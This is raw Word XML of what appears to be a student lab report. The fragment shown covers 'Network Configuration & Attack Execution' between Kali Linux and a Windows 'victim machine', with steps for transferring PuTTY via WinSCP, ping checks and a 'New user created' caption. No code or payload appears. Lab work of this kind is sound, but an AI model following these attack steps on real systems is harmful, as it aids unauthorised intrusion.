    <w:p w14:paraId="0BB86E2D" w14:textId="2850BD20" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WinSCP installed on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38064967" w14:textId="06493F8C" w:rsidR="00806273" w:rsidRPr="00557EB4" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Network adapter in bridged mode for communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643AD440" w14:textId="356993A9" w:rsidR="00806273" w:rsidRPr="00304CB2" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA7A65D" w14:textId="21154F69" w:rsidR="0041594E" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>I.5. Network Configuration &amp; Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07289FE8" w14:textId="448BEAC2" w:rsidR="0041594E" w:rsidRDefault="0041594E" w:rsidP="00806273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Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041594E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer PuTTY to Victim Machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3B55C" w14:textId="520C186E" w:rsidR="0041594E" w:rsidRPr="00642759" w:rsidRDefault="0041594E" w:rsidP="00642759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642759">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open WinSCP on Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E116A67" w14:textId="05D4C2BA" w:rsidR="0041594E" w:rsidRPr="00642759" w:rsidRDefault="0041594E" w:rsidP="00642759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642759">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Connect to the victim machine using appropriate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C1361" w14:textId="250006E6" w:rsidR="0041594E" w:rsidRDefault="0041594E" w:rsidP="00642759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642759">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Transfer the legitimate PuTTY executable to a designated folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0EA1B" w14:textId="77777777" w:rsidR="00E02D55" w:rsidRPr="00642759" w:rsidRDefault="00E02D55" w:rsidP="00E02D55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15864FF3" w14:textId="66073BE3" w:rsidR="00806273" w:rsidRDefault="002C5E7E" w:rsidP="00806273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55274A38" wp14:editId="20C8905D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3136265" cy="220980"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20483"/>
                <wp:lineTo x="21517" y="20483"/>
                <wp:lineTo x="21517" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="11014787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78774" name="Picture 110147877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274" cy="22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A6C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64FC19D0" wp14:editId="4956FDC0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3512820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1630821" cy="419136"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20618"/>
                <wp:lineTo x="21449" y="20618"/>
                <wp:lineTo x="21449" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="114311060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10607" name="Picture 114311060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821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5E0F6D" w14:textId="657BD3FE" w:rsidR="0041594E" w:rsidRDefault="005C7E28" w:rsidP="00806273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C6A9747" wp14:editId="6A4B6FC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3429000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>107315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2362200" cy="297180"/>
                <wp:effectExtent l="0" t="0" r="19050" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="21049810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2971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10844B9" w14:textId="00D17B03" w:rsidR="002C5E7E" w:rsidRPr="00E02D55" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="005C7E28" w:rsidRPr="00E02D5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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>Ip address of kali</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="25413A29" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E2E0C19" wp14:editId="77931BF5">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="1414817385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08710" cy="1231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A9747" id="Text Box 1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:270pt;margin-top:8.45pt;width:186pt;height:23.4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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="310844B9" w14:textId="00D17B03" w:rsidR="002C5E7E" w:rsidRPr="00E02D55" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="005C7E28" w:rsidRPr="00E02D55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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>Ip address of kali</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="25413A29" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E2E0C19" wp14:editId="77931BF5">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="1414817385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08710" cy="1231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61965F" wp14:editId="65814E93">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>411480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1653540" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="94783871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4289AF8" w14:textId="48D241EE" w:rsidR="002C5E7E" w:rsidRPr="00E02D55" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00E02D5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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="005C7E28" w:rsidRPr="00E02D5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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Ip address of Windows </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="325A5DBF" w14:textId="7A669002" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78976C74" wp14:editId="7C058259">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="1143379403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08710" cy="1231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1965F" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:32.4pt;margin-top:.85pt;width:130.2pt;height:2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" fillcolor="white [3201]" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="64289AF8" w14:textId="48D241EE" w:rsidR="002C5E7E" w:rsidRPr="00E02D55" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00E02D55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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="005C7E28" w:rsidRPr="00E02D55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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Ip address of Windows </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="325A5DBF" w14:textId="7A669002" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78976C74" wp14:editId="7C058259">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="1143379403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08710" cy="1231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B4EE7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442DE559" wp14:editId="295190E8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>460375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2948940" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20721"/>
                <wp:lineTo x="21488" y="20721"/>
                <wp:lineTo x="21488" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4689075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07532" name="Picture 46890753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B4EE7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36DA81D0" wp14:editId="3930EC2C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3253740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>445135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2575560" cy="556260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20712"/>
                <wp:lineTo x="21408" y="20712"/>
                <wp:lineTo x="21408" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1320404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04575" name="Picture 132040457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A820CAD" w14:textId="052B7D8E" w:rsidR="0041594E" w:rsidRDefault="008A5EBE" w:rsidP="00806273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45BA0220" wp14:editId="345744B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3848100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1062990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1851660" cy="1028700"/>
            <wp:effectExtent l="57150" t="19050" r="53340" b="95250"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-444" y="-400"/>
                <wp:lineTo x="-667" y="0"/>
                <wp:lineTo x="-667" y="22800"/>
                <wp:lineTo x="-444" y="23200"/>
                <wp:lineTo x="21778" y="23200"/>
                <wp:lineTo x="22000" y="19600"/>
                <wp:lineTo x="22000" y="6400"/>
                <wp:lineTo x="21778" y="400"/>
                <wp:lineTo x="21778" y="-400"/>
                <wp:lineTo x="-444" y="-400"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4444860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86096" name="Picture 44448609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10287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13F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A0A9C5" wp14:editId="330C5BE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>974090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2362200" cy="289560"/>
                <wp:effectExtent l="0" t="0" r="19050" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="16063741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289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6995AB0" w14:textId="681C6A79" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Pinging the </w:t>
                            </w:r>
                            <w:r w:rsidR="008A5EBE" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>IP</w:t>
                            </w:r>
                            <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> of kali in windows</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4438D4EC" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572C6E77" wp14:editId="5E96C0A4">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="1397584309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08710" cy="1231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0A9C5" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:21.6pt;margin-top:76.7pt;width:186pt;height:22.8pt;z-index:2516725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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="06995AB0" w14:textId="681C6A79" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Pinging the </w:t>
                      </w:r>
                      <w:r w:rsidR="008A5EBE" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>IP</w:t>
                      </w:r>
                      <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> of kali in windows</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4438D4EC" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572C6E77" wp14:editId="5E96C0A4">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="1397584309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08710" cy="1231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C6A5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383B5C5" wp14:editId="119F2F59">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3444240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>745490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2362200" cy="281940"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="71987156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2819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E5E6ACA" w14:textId="26D77A5A" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Pinging the </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>ip</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> of windows in kali</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47339ED3" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791EFB20" wp14:editId="3494E33A">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="1427542621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08710" cy="1231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3B5C5" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:271.2pt;margin-top:58.7pt;width:186pt;height:22.2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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3E5E6ACA" w14:textId="26D77A5A" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Pinging the </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>ip</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00FC6A5F" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> of windows in kali</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47339ED3" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791EFB20" wp14:editId="3494E33A">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="1427542621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08710" cy="1231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09D7448" w14:textId="6BC5250E" w:rsidR="0041594E" w:rsidRDefault="0041594E" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435A2FE3" w14:textId="525636F8" w:rsidR="00482F30" w:rsidRDefault="002C5E7E" w:rsidP="00806273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6CE76DFF" wp14:editId="24E1304C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880360" cy="556260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20712"/>
                <wp:lineTo x="21429" y="20712"/>
                <wp:lineTo x="21429" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7481607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60767" name="Picture 74816076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02A11C" w14:textId="5090371F" w:rsidR="00482F30" w:rsidRDefault="008A5EBE" w:rsidP="00806273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EDEB328" wp14:editId="527C875C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>205740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2362200" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="72869677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304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2674F4B" w14:textId="1BC67686" w:rsidR="007213F3" w:rsidRPr="008A5EBE" w:rsidRDefault="007213F3" w:rsidP="007213F3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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>New user cr</w:t>
                            </w:r>
                            <w:r w:rsidR="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>ea</w:t>
                            </w:r>
                            <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>ted</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6059BFAB" w14:textId="77777777" w:rsidR="007213F3" w:rsidRDefault="007213F3" w:rsidP="007213F3">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AB4F759" wp14:editId="2B81D1FF">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="1854513390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08710" cy="1231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EB328" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:16.2pt;margin-top:21pt;width:186pt;height:24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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="52674F4B" w14:textId="1BC67686" w:rsidR="007213F3" w:rsidRPr="008A5EBE" w:rsidRDefault="007213F3" w:rsidP="007213F3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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>New user cr</w:t>
                      </w:r>
                      <w:r w:rsidR="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>ea</w:t>
                      </w:r>
                      <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>ted</w:t>
                      </w:r>
                    </w:p>
